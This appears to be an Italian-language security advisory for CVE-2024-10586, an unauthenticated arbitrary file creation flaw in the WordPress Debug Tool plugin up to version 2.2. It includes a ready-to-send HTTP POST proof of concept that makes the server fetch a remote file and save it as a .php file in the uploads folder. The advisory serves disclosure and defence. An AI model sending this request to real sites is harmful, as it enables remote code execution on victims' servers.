
Debug Tool <= 2.2 - Creazione Arbitraria di File Non Autenticata
Debug Tool <= 2.2 - Creazione Arbitraria di File Non Autenticata
Il plugin Debug Tool per WordPress è vulnerabile alla creazione arbitraria di file a causa della mancanza di un controllo delle capacità nella funzione dbt_pull_image() e della mancanza di validazione del tipo di file in tutte le versioni fino alla 2.2 inclusa. Ciò consente ad attaccanti non autenticati di creare file arbitrari come file .php che possono essere sfruttati per l'esecuzione remota di codice.
CVE: CVE-2024-10586
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: debug-tool
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/themes.php?page=themehunk-site-library&template=step
X-WP-Nonce: 47f8dbbb12
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 104
Origin: http://kubernetes.docker.internal
Connection: keep-alive
action=dbt_pull_image&source=http://rfi.nessus.org/rfi.txt&missed=/var/www/html/wp-content/uploads/t.php